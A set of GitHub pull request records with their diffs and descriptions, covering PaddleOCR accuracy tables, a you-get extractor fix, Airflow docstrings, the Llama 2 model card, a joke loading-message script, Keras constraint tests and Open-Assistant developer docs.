diff --git a/doc/doc_ch/algorithm_overview.md b/doc/doc_ch/algorithm_overview.md index 0fd2f5b754..0db6c6f7ff 100755 --- a/doc/doc_ch/algorithm_overview.md +++ b/doc/doc_ch/algorithm_overview.md @@ -61,18 +61,18 @@ PaddleOCR基于动态图开源的文本识别算法列表: |模型|骨干网络|Avg Accuracy|模型存储命名|下载链接| |---|---|---|---|---| -|Rosetta|Resnet34_vd|80.9%|rec_r34_vd_none_none_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_none_ctc_v2.0_train.tar)| -|Rosetta|MobileNetV3|78.05%|rec_mv3_none_none_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_none_ctc_v2.0_train.tar)| -|CRNN|Resnet34_vd|82.76%|rec_r34_vd_none_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_bilstm_ctc_v2.0_train.tar)| -|CRNN|MobileNetV3|79.97%|rec_mv3_none_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_bilstm_ctc_v2.0_train.tar)| -|StarNet|Resnet34_vd|84.44%|rec_r34_vd_tps_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_ctc_v2.0_train.tar)| -|StarNet|MobileNetV3|81.42%|rec_mv3_tps_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_ctc_v2.0_train.tar)| -|RARE|MobileNetV3|82.5%|rec_mv3_tps_bilstm_att |[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_att_v2.0_train.tar)| -|RARE|Resnet34_vd|83.6%|rec_r34_vd_tps_bilstm_att |[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_att_v2.0_train.tar)| -|SRN|Resnet50_vd_fpn| 88.52% | rec_r50fpn_vd_none_srn | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r50_vd_srn_train.tar) | -|NRTR|NRTR_MTB| 84.3% | rec_mtb_nrtr | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mtb_nrtr_train.tar) | -|SAR|Resnet31| 87.2% | rec_r31_sar | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_r31_sar_train.tar) | -|SEED|Aster_Resnet| 85.2% | rec_resnet_stn_bilstm_att | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_resnet_stn_bilstm_att.tar) | +|Rosetta|Resnet34_vd|79.11%|rec_r34_vd_none_none_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_none_ctc_v2.0_train.tar)| +|Rosetta|MobileNetV3|75.80%|rec_mv3_none_none_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_none_ctc_v2.0_train.tar)| +|CRNN|Resnet34_vd|81.04%|rec_r34_vd_none_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_bilstm_ctc_v2.0_train.tar)| +|CRNN|MobileNetV3|77.95%|rec_mv3_none_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_bilstm_ctc_v2.0_train.tar)| +|StarNet|Resnet34_vd|82.85%|rec_r34_vd_tps_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_ctc_v2.0_train.tar)| +|StarNet|MobileNetV3|79.28%|rec_mv3_tps_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_ctc_v2.0_train.tar)| +|RARE|Resnet34_vd|83.98%|rec_r34_vd_tps_bilstm_att |[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_att_v2.0_train.tar)| +|RARE|MobileNetV3|81.76%|rec_mv3_tps_bilstm_att |[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_att_v2.0_train.tar)| +|SRN|Resnet50_vd_fpn| 86.31% | rec_r50fpn_vd_none_srn | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r50_vd_srn_train.tar) | +|NRTR|NRTR_MTB| 84.21% | rec_mtb_nrtr | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mtb_nrtr_train.tar) | +|SAR|Resnet31| 87.20% | rec_r31_sar | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_r31_sar_train.tar) | +|SEED|Aster_Resnet| 85.35% | rec_resnet_stn_bilstm_att | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_resnet_stn_bilstm_att.tar) | <a name="2"></a> diff --git a/doc/doc_en/algorithm_overview_en.md b/doc/doc_en/algorithm_overview_en.md index 8d27613ba8..3e94360653 100755 --- a/doc/doc_en/algorithm_overview_en.md +++ b/doc/doc_en/algorithm_overview_en.md @@ -67,20 +67,20 @@ Refer to [DTRB](https://arxiv.org/abs/1904.01906), the training and evaluation r |Model|Backbone|Avg Accuracy|Module combination|Download link| |---|---|---|---|---| -|Rosetta|Resnet34_vd|80.9%|rec_r34_vd_none_none_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_none_ctc_v2.0_train.tar)| -|Rosetta|MobileNetV3|78.05%|rec_mv3_none_none_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_none_ctc_v2.0_train.tar)| -|CRNN|Resnet34_vd|82.76%|rec_r34_vd_none_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_bilstm_ctc_v2.0_train.tar)| -|CRNN|MobileNetV3|79.97%|rec_mv3_none_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_bilstm_ctc_v2.0_train.tar)| -|StarNet|Resnet34_vd|84.44%|rec_r34_vd_tps_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_ctc_v2.0_train.tar)| -|StarNet|MobileNetV3|81.42%|rec_mv3_tps_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_ctc_v2.0_train.tar)| -|RARE|MobileNetV3|82.5%|rec_mv3_tps_bilstm_att |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_att_v2.0_train.tar)| -|RARE|Resnet34_vd|83.6%|rec_r34_vd_tps_bilstm_att |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_att_v2.0_train.tar)| -|SRN|Resnet50_vd_fpn| 88.52% | rec_r50fpn_vd_none_srn |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r50_vd_srn_train.tar)| -|NRTR|NRTR_MTB| 84.3% | rec_mtb_nrtr | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mtb_nrtr_train.tar) | -|SAR|Resnet31| 87.2% | rec_r31_sar | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_r31_sar_train.tar) | -|SEED|Aster_Resnet| 85.2% | rec_resnet_stn_bilstm_att | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_resnet_stn_bilstm_att.tar) | - -Please refer to the document for training guide and use of PaddleOCR +|Rosetta|Resnet34_vd|79.11%|rec_r34_vd_none_none_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_none_ctc_v2.0_train.tar)| +|Rosetta|MobileNetV3|75.80%|rec_mv3_none_none_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_none_ctc_v2.0_train.tar)| +|CRNN|Resnet34_vd|81.04%|rec_r34_vd_none_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_bilstm_ctc_v2.0_train.tar)| +|CRNN|MobileNetV3|77.95%|rec_mv3_none_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_bilstm_ctc_v2.0_train.tar)| +|StarNet|Resnet34_vd|82.85%|rec_r34_vd_tps_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_ctc_v2.0_train.tar)| +|StarNet|MobileNetV3|79.28%|rec_mv3_tps_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_ctc_v2.0_train.tar)| +|RARE|Resnet34_vd|83.98%|rec_r34_vd_tps_bilstm_att |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_att_v2.0_train.tar)| +|RARE|MobileNetV3|81.76%|rec_mv3_tps_bilstm_att |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_att_v2.0_train.tar)| +|SRN|Resnet50_vd_fpn| 86.31% | rec_r50fpn_vd_none_srn |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r50_vd_srn_train.tar)| +|NRTR|NRTR_MTB| 84.21% | rec_mtb_nrtr | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mtb_nrtr_train.tar) | +|SAR|Resnet31| 87.20% | rec_r31_sar | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_r31_sar_train.tar) | +|SEED|Aster_Resnet| 85.35% | rec_resnet_stn_bilstm_att | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_resnet_stn_bilstm_att.tar) | + +Please refer to the document for training guide and use of PaddleOCR ## 2. Training
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/5276
2022-01-17T09:55:11Z
2022-01-17T10:40:23Z
2022-01-17T10:40:23Z
2022-01-17T10:40:24Z
3,343
PaddlePaddle/PaddleOCR
42,298
[ixigua] fix 'string indices must be integers'
diff --git a/src/you_get/extractors/ixigua.py b/src/you_get/extractors/ixigua.py index b368b380ab..f2fd953e69 100644 --- a/src/you_get/extractors/ixigua.py +++ b/src/you_get/extractors/ixigua.py @@ -95,6 +95,8 @@ def ixigua_download(url, output_dir='.', merge=True, info_only=False, stream_id= def convertStreams(video_list, audio_url): streams = [] + if type(video_list) == dict: + video_list = video_list.values() for dynamic_video in video_list: streams.append({ 'file_id': dynamic_video['file_hash'],
`you-get -i --debug "https://www.ixigua.com/7114608501724283407?app=video_article&timestamp=1663582546&utm_medium=android&utm_campaign=client_share&utm_source=wechat_friend&test_group=v1"` will traceback: ``` Traceback (most recent call last): File "d:\setup\you-get\you-get", line 11, in <module> you_get.main(repo_path=_filepath) File "D:\setup\you-get/src\you_get\__main__.py", line 92, in main main(**kwargs) File "D:\setup\you-get/src\you_get\common.py", line 1867, in main script_main(any_download, any_download_playlist, **kwargs) File "D:\setup\you-get/src\you_get\common.py", line 1759, in script_main download_main( File "D:\setup\you-get/src\you_get\common.py", line 1379, in download_main download(url, **kwargs) File "D:\setup\you-get/src\you_get\common.py", line 1858, in any_download m.download(url, **kwargs) File "D:\setup\you-get/src\you_get\extractors\ixigua.py", line 69, in ixigua_download streams = convertStreams(dynamic_video_list, "") File "D:\setup\you-get/src\you_get\extractors\ixigua.py", line 103, in convertStreams 'file_id': dynamic_video['file_hash'], TypeError: string indices must be integers ```
https://api.github.com/repos/soimort/you-get/pulls/2980
2022-09-20T03:18:24Z
2022-10-08T22:08:04Z
2022-10-08T22:08:04Z
2022-10-08T22:08:10Z
160
soimort/you-get
20,936
[AIRFLOW-XXX] Fix docstrings of SQSHook
diff --git a/airflow/contrib/hooks/aws_sqs_hook.py b/airflow/contrib/hooks/aws_sqs_hook.py index 00ae231e564ab..3fc465d6811c2 100644 --- a/airflow/contrib/hooks/aws_sqs_hook.py +++ b/airflow/contrib/hooks/aws_sqs_hook.py @@ -23,6 +23,7 @@ class SQSHook(AwsHook): """ Get the SQS client using boto3 library + :return: SQS client :rtype: botocore.client.SQS """ @@ -30,42 +31,40 @@ class SQSHook(AwsHook): def get_conn(self): return self.get_client_type('sqs') - """ - Create queue using connection object - :param queue_name: name of the queue. - :type queue_name: str - :param attributes: additional attributes for the queue (default: None) - :type attributes: dict - - For details of the attributes parameter see :py:meth:`botocore.client.SQS.create_queue` + def create_queue(self, queue_name, attributes=None): + """ + Create queue using connection object - :return: dict with the information about the queue - :rtype: dict + :param queue_name: name of the queue. + :type queue_name: str + :param attributes: additional attributes for the queue (default: None) + For details of the attributes parameter see :py:meth:`botocore.client.SQS.create_queue` + :type attributes: dict - For details of the returned value see :py:meth:`botocore.client.SQS.create_queue` - """ - def create_queue(self, queue_name, attributes=None): + :return: dict with the information about the queue + For details of the returned value see :py:meth:`botocore.client.SQS.create_queue` + :rtype: dict + """ return self.get_conn().create_queue(QueueName=queue_name, Attributes=attributes or {}) - """ - Send message to the queue - :param queue_url: queue url - :type queue_url: str - :param message_body: the contents of the message - :type message_body: str - :param delay_seconds: seconds to delay the message - :type delay_seconds: int - :param message_attributes: additional attributes for the message (default: None) - :type message_attributes: dict - - For details of the attributes parameter see :py:meth:`botocore.client.SQS.send_message` + def send_message(self, queue_url, message_body, delay_seconds=0, message_attributes=None): + """ + Send message to the queue - :return: dict with the information about the message sent - :rtype: dict + :param queue_url: queue url + :type queue_url: str + :param message_body: the contents of the message + :type message_body: str + :param delay_seconds: seconds to delay the message + :type delay_seconds: int + :param message_attributes: additional attributes for the message (default: None) + For details of the attributes parameter see :py:meth:`botocore.client.SQS.send_message` + :type message_attributes: dict - For details of the returned value see :py:meth:`botocore.client.SQS.send_message` - """ - def send_message(self, queue_url, message_body, delay_seconds=0, message_attributes=None): + :return: dict with the information about the message sent + For details of the returned value see :py:meth:`botocore.client.SQS.send_message` + :rtype: dict + """ return self.get_conn().send_message(QueueUrl=queue_url, MessageBody=message_body, DelaySeconds=delay_seconds,
Make sure you have checked _all_ steps below. ### Jira - [x] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title. For example, "\[AIRFLOW-XXX\] My Airflow PR" - https://issues.apache.org/jira/browse/AIRFLOW-XXX ### Description - [x] Here are some details about my PR, including screenshots of any UI changes: https://github.com/apache/airflow/pull/4887 added hook but docstrings were in an incorrect position. ### Tests - [x] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason: ### Commits - [x] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)": 1. Subject is separated from body by a blank line 1. Subject is limited to 50 characters (not including Jira issue reference) 1. Subject does not end with a period 1. Subject uses the imperative mood ("add", not "adding") 1. Body wraps at 72 characters 1. Body explains "what" and "why", not "how" ### Documentation - [x] In case of new functionality, my PR adds documentation that describes how to use it. - All the public functions and the classes in the PR contain docstrings that explain what it does - If you implement backwards incompatible changes, please leave a note in the [Updating.md](https://github.com/apache/airflow/blob/master/UPDATING.md) so we can assign it to a appropriate release ### Code Quality - [x] Passes `flake8`
https://api.github.com/repos/apache/airflow/pulls/5099
2019-04-15T00:27:16Z
2019-04-15T02:26:03Z
2019-04-15T02:26:03Z
2019-08-30T20:39:39Z
877
apache/airflow
14,379
Update MODEL_CARD.md
diff --git a/MODEL_CARD.md b/MODEL_CARD.md index 18d9dfea8..5b0128564 100644 --- a/MODEL_CARD.md +++ b/MODEL_CARD.md @@ -33,7 +33,9 @@ Llama 2|*A new mix of publicly available online data*|70B|4k|&#10004;|2.0T|1.5 x # **Intended Use** **Intended Use Cases** Llama 2 is intended for commercial and research use in English. Tuned models are intended for assistant-like chat, whereas pretrained models can be adapted for a variety of natural language generation tasks. -**Out-of-scope Uses** Use in any manner that violates applicable laws or regulations (including trade compliance laws). Use in languages other than English. Use in any other way that is prohibited by the Acceptable Use Policy and Licensing Agreement for Llama 2. +**Out-of-scope** Uses Use in any manner that violates applicable laws or regulations (including trade compliance laws). Use in any other way that is prohibited by the Acceptable Use Policy and Llama 2 Community License. Use in languages other than English**. + +**Note: Developers may fine-tune Llama 2 models for languages beyond English provided they comply with the Llama 2 Community License and the Acceptable Use Policy. # **Hardware and Software** **Training Factors** We used custom training libraries, Meta's Research Super Cluster, and production clusters for pretraining. Fine-tuning, annotation, and evaluation were also performed on third-party cloud compute.
Updated intended use cases to clarify that developers can fine tune for non-english languages.
https://api.github.com/repos/meta-llama/llama/pulls/813
2023-09-20T22:18:46Z
2023-09-21T00:47:42Z
2023-09-21T00:47:42Z
2023-09-21T00:47:42Z
342
meta-llama/llama
31,988
Python script that chooses from 80 funny loading lines
diff --git a/randomloadingmessage.py b/randomloadingmessage.py new file mode 100644 index 0000000000..9ad93403bc --- /dev/null +++ b/randomloadingmessage.py @@ -0,0 +1,167 @@ +# Created by Nathan R (Mosrod) +# CREDIT TO https://github.com/1egoman/funnies/blob/master/src/funnies.js + +from random import * + +x = 1 + +for i in range(x): + num = randint(1, 80) + if num == 1: + print("Reticulating splines...") + if num == 2: + print("Swapping time and space...") + if num == 3: + print("Spinning violently around the y-axis...") + if num == 4: + print("Tokenizing real life...") + if num == 5: + print("Bending the spoon...") + if num == 6: + print("Filtering morale...") + if num == 7: + print("We need a new fuse...") + if num == 8: + print("Have a good day.") + if num == 9: + print("Upgrading Windows, your PC will restart several times. Sit back and relax.") + if num == 10: + print("The architects are still drafting.") + if num == 11: + print("We're building the buildings as fast as we can.") + if num == 12: + print("Please wait while the little elves draw your map.") + if num == 13: + print("Don't worry - a few bits tried to escape, but we caught them.") + if num == 14: + print("Go ahead -- hold your breath!") + if num == 15: + print("...at least you're not on hold...") + if num == 16: + print("The server is powered by a lemon and two electrodes.") + if num == 17: + print("We're testing your patience.") + if num == 18: + print("As if you had any other choice.") + if num == 19: + print("The bits are flowing slowly today.") + if num == 20: + print("It's still faster than you could draw it.") + if num == 21: + print("My other loading screen is much faster.") + if num == 22: + print("(Insert quarter)") + if num == 23: + print("Are we there yet?") + if num == 24: + print("Just count to 10.") + if num == 25: + print("Don't panic...") + if num == 26: + print("We're making you a cookie.") + if num == 27: + print("Creating time-loop inversion field.") + if num == 28: + print("Computing chance of success.") + if num == 29: + print("All I really need is a kilobit.") + if num == 30: + print("I feel like im supposed to be loading something...") + if num == 31: + print("Should have used a compiled language...") + if num == 32: + print("Is this Windows?") + if num == 33: + print("Don't break your screen yet!") + if num == 34: + print("I swear it's almost done.") + if num == 35: + print("Let's take a mindfulness minute...") + if num == 36: + print("Listening for the sound of one hand clapping...") + if num == 37: + print("Keeping all the 1's and removing all the 0's...") + if num == 38: + print("We are not liable for any broken screens as a result of waiting.") + if num == 39: + print("Where did all the internets go?") + if num == 40: + print("Granting wishes...") + if num == 41: + print("Time flies when you’re having fun.") + if num == 42: + print("Get some coffee and come back in ten minutes...") + if num == 43: + print("Stay awhile and listen...") + if num == 44: + print("Convincing AI not to turn evil...") + if num == 45: + print("How did you get here?") + if num == 46: + print("Wait, do you smell something burning?") + if num == 47: + print("Computing the secret to life, the universe, and everything.") + if num == 48: + print("When nothing is going right, go left...") + if num == 49: + print("I love my job only when I'm on vacation...") + if num == 50: + print("Why are they called apartments if they are all stuck together?") + if num == 51: + print("I’ve got problem for your solution...") + if num == 52: + print("Whenever I find the key to success, someone changes the lock.") + if num == 53: + print("Constructing additional pylons...") + if num == 54: + print("You don’t pay taxes—they take taxes.") + if num == 55: + print("A commit a day keeps the mobs away.") + if num == 56: + print("This is not a joke, it's a commit.") + if num == 57: + print("Hello IT, have you tried turning it off and on again?") + if num == 58: + print("Hello, IT... Have you tried forcing an unexpected reboot?") + if num == 59: + print("I didn't choose the engineering life. The engineering life chose me.") + if num == 60: + print("Dividing by zero...") + if num == 61: + print("If I’m not back in five minutes, just wait longer.") + if num == 62: + print("Web developers do it with <style>") + if num == 63: + print("Cracking military-grade encryption...") + if num == 64: + print("Entangling superstrings...") + if num == 65: + print("Looking for sense of humour, please hold on.") + if num == 66: + print("A different error message? Finally, some progress!") + if num == 67: + print("Please hold on as we reheat our coffee.") + if num == 68: + print("Kindly hold on as we convert this bug to a feature...") + if num == 69: + print("Kindly hold on as our intern quits vim...") + if num == 71: + print("Winter is coming...") + if num == 72: + print("Installing dependencies.") + if num == 73: + print("Switching to the latest JS framework...") + if num == 74: + print("Let's hope it's worth the wait.") + if num == 75: + print("Aw, snap! Not...") + if num == 76: + print("Ordering 1s and 0s...") + if num == 77: + print("Updating dependencies...") + if num == 78: + print("Please wait... Consulting the manual...") + if num == 79: + print("Loading funny message...") + if num == 80: + print("Feel free to spin in your chair.")
This is a great loading script for your program to bright up your day!
https://api.github.com/repos/geekcomputers/Python/pulls/393
2018-10-07T23:47:39Z
2018-10-08T18:25:17Z
2018-10-08T18:25:17Z
2018-10-08T18:25:22Z
1,715
geekcomputers/Python
31,430
New pull request -- much cleaner
diff --git a/tests/auto/keras/test_constraints.py b/tests/auto/keras/test_constraints.py new file mode 100644 index 00000000000..dbfba0f7396 --- /dev/null +++ b/tests/auto/keras/test_constraints.py @@ -0,0 +1,69 @@ +import unittest +import numpy as np +from numpy.testing import assert_allclose +from theano import tensor as T + + +class TestConstraints(unittest.TestCase): + def setUp(self): + self.some_values = [0.1, 0.5, 3, 8, 1e-7] + np.random.seed(3537) + self.example_array = np.random.random((100, 100)) * 100. - 50. + self.example_array[0, 0] = 0. # 0 could possibly cause trouble + + def test_maxnorm(self): + from keras.constraints import maxnorm + + for m in self.some_values: + norm_instance = maxnorm(m) + normed = norm_instance(self.example_array) + assert (np.all(normed.eval() < m)) + + # a more explicit example + norm_instance = maxnorm(2.0) + x = np.array([[0, 0, 0], [1.0, 0, 0], [3, 0, 0], [3, 3, 3]]).T + x_normed_target = np.array([[0, 0, 0], [1.0, 0, 0], [2.0, 0, 0], [2./np.sqrt(3), 2./np.sqrt(3), 2./np.sqrt(3)]]).T + x_normed_actual = norm_instance(x).eval() + assert_allclose(x_normed_actual, x_normed_target) + + def test_nonneg(self): + from keras.constraints import nonneg + + nonneg_instance = nonneg() + + normed = nonneg_instance(self.example_array) + assert (np.all(np.min(normed.eval(), axis=1) == 0.)) + + def test_identity(self): + from keras.constraints import identity + + identity_instance = identity() + + normed = identity_instance(self.example_array) + assert (np.all(normed == self.example_array)) + + def test_identity_oddballs(self): + """ + test the identity constraint on some more exotic input. + this does not need to pass for the desired real life behaviour, + but it should in the current implementation. + """ + from keras.constraints import identity + identity_instance = identity() + + oddball_examples = ["Hello", [1], -1, None] + assert(oddball_examples == identity_instance(oddball_examples)) + + def test_unitnorm(self): + from keras.constraints import unitnorm + unitnorm_instance = unitnorm() + + normalized = unitnorm_instance(self.example_array) + + norm_of_normalized = np.sqrt(np.sum(normalized.eval()**2, axis=1)) + difference = norm_of_normalized - 1. #in the unit norm constraint, it should be equal to 1. + largest_difference = np.max(np.abs(difference)) + self.assertAlmostEqual(largest_difference, 0.) + +if __name__ == '__main__': + unittest.main()
Weird file deletions have gone. Rebase done. Sorry for before :)
https://api.github.com/repos/keras-team/keras/pulls/327
2015-07-03T00:07:57Z
2015-07-03T00:48:27Z
2015-07-03T00:48:27Z
2015-07-03T05:12:37Z
760
keras-team/keras
47,449
Update the developers guide to the current state of the project
diff --git a/docs/docs/guides/developers.md b/docs/docs/guides/developers.md index 1617fad538..96690d09fb 100644 --- a/docs/docs/guides/developers.md +++ b/docs/docs/guides/developers.md @@ -89,16 +89,15 @@ can create their own custom assistants. ## The tools A web application, usually referred to as **"the web frontend"**, has been -created. Initially, it supports the first two steps of the process outlined in -the previous section, which require humans creating conversations (step 1) and -ranking answers (step 2). +created. It supports the first two steps of the process outlined in the previous +section, which require humans creating conversations (step 1) and ranking +answers (step 2). It also supports the inference step, creating a chat +interface. -For this same goal, data gathering, a discord bot is being created. We'll call -it **"the data gathering discord bot"**. +For data gathering, two discord bots were created, one using Python and the +other using Javascript. The latter also supports the inference process. -For doing the inference, once the final model is ready, an **"inference -service"** is being created. Another section will be added to the web frontend, -so that the assistant can be used from the web. +For doing the inference, an **"inference service"** has been created. In addition, for collecting the instruction dataset, a set of **scripts and notebooks** is being developed. @@ -134,10 +133,10 @@ When you run `npm run dev` in the website directory, it starts the Next.js application in the node server. The Next.js application is available at `http://localhost:3000`. -In the Dockerfile, there's also a `maildev` container that is used during to be -able to sent emails for registration, although for local development there are -fake users pre-created and this is not required. There is a fake user called -`dev` and it can be assigned a role during log in. +In the Dockerfile, there's also a `maildev` container that is used to be able to +sent emails for registration, although for local development there are fake +users pre-created and this is not required. There is a fake user called `dev` +and it can be assigned a role during log in. There are other scripts related to the frontend in the directory [scripts/frontend-development](https://github.com/LAION-AI/Open-Assistant/tree/main/scripts/frontend-development). @@ -146,16 +145,15 @@ Another included tool that can be interesting during development is [storybook](https://storybook.js.org/): it allows you to test UI components without having to run the whole application. -### The data gathering Discord bot +### The Discord bots -This is a Discord bot that is used to gather data for the assistant, as a -complement to the web data gathering application. Its source code is in the -[discord-bot](https://github.com/LAION-AI/Open-Assistant/tree/main/discord-bot) -directory and it's written in Python. +These are the Discord bots mentioned above. Their source code is in the +[discord-bots](https://github.com/LAION-AI/Open-Assistant/tree/main/discord-bots) +directory. ### The FastAPI backend -This provides an API that's used by the web frontend and the Discord bot to +This provides an API that's used by the web frontend and the Discord bots to store conversation trees and their metadata. It's written in Python using FastAPI as framework and its source code is in the [backend directory](https://github.com/LAION-AI/Open-Assistant/tree/main/backend). @@ -168,7 +166,7 @@ There's also a Redis database, called `redis` in the Dockerfile, for caching API requets. In the Dockerfile, there are also two containers with development support tools -for the databases: `adminer`, that can be used to inspect the Postgres +for the databases: `adminer`, which can be used to inspect the Postgres databases, and `redis-insights` to inspect the Redis database. Although there's some data already in the Postgres backend database, more can be @@ -182,12 +180,13 @@ conversation tree and the work package. ### The inference service -The inference service will be the component that answers prompts when the model -is ready, i.e., the assistant. It's written in Python and its source code is in -the [inference](https://github.com/LAION-AI/Open-Assistant/tree/main/inference) +The inference service is the component that answers prompts using a model, i.e., +it is the assistant itself. It's written in Python and its source code is in the +[inference](https://github.com/LAION-AI/Open-Assistant/tree/main/inference) directory. It has a server and several workers. It also has its own Postgres database in a container called `inference-db` in the Dockerfile, and a Redis -database in the `redis-inference` container. +database in the `redis-inference` container. There's another container for +safety called `inference-safety`. The server is a FastAPI application that communicates via websockets with the workers, which are the ones that use the model to carry out the inference. @@ -208,7 +207,9 @@ explains how to contribute a new dataset. There's also a [notebooks](https://github.com/LAION-AI/Open-Assistant/tree/main/notebooks) -directory with different notebooks to process the data. +directory with different notebooks for data scraping and augmentation, but it's +being deprecated in favor of the directory +[data/datasets](https://github.com/LAION-AI/Open-Assistant/blob/main/data/datasets). ### The docs @@ -242,10 +243,16 @@ website directory. - `inference`. It includes these containers: - - `inference-db`, `inference-server`, `inference-worker`, `inference-redis` + - `inference-db`, `inference-server`, `inference-worker`, `inference-redis`, + `inference-safety` + +- `inference-dev`. It includes these containers: + + - `db`, `web-db`, `backend` - `observability`. It includes tools to monitor the application. It includes these containers: + - `prometheus`, `grafana`, `netdata` Notice that you can combine profiles, for example, `ci` and `observability`. @@ -277,12 +284,12 @@ flowchart TD infworker1((inference-worker <br> 1)) infworker2((inference-worker <br> ...)) infworkerN((inference-worker <br> n)) - infserv(("inference-server <br> (FastAPI)")) - infserv --> infdb(("inference-db <br> (Postgres)")) - infserv --> infredis(("inference-redis")) + infserv(("inference-server <br> (FastAPI)")) --> infdb(("inference-db <br> (Postgres)")) + infsafety((inference-safety)) infserv --> infworker1 infserv --> infworker2 infserv --> infworkerN + infserv --> infsafety end subgraph support[Dev support tools] adminer((adminer)) @@ -312,7 +319,7 @@ Lead, [Christoph Schumann](https://github.com/christophschuhmann), who is the Organizational Lead and a founder of [LAION](https://laion.ai/), and Huu Nguyen, from [Ontocord](https://github.com/ontocord). -There's a +There's a [Teams page](https://open-assistant.io/team) and a [CODEOWNERS](https://github.com/LAION-AI/Open-Assistant/blob/main/CODEOWNERS) file that lists the code owners of different parts of the project. However, there are many
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/2623
2023-04-16T18:31:46Z
2023-04-16T18:38:12Z
2023-04-16T18:38:12Z
2023-04-16T18:38:13Z
1,803
LAION-AI/Open-Assistant
37,057
Correcting the Gaussian Formula
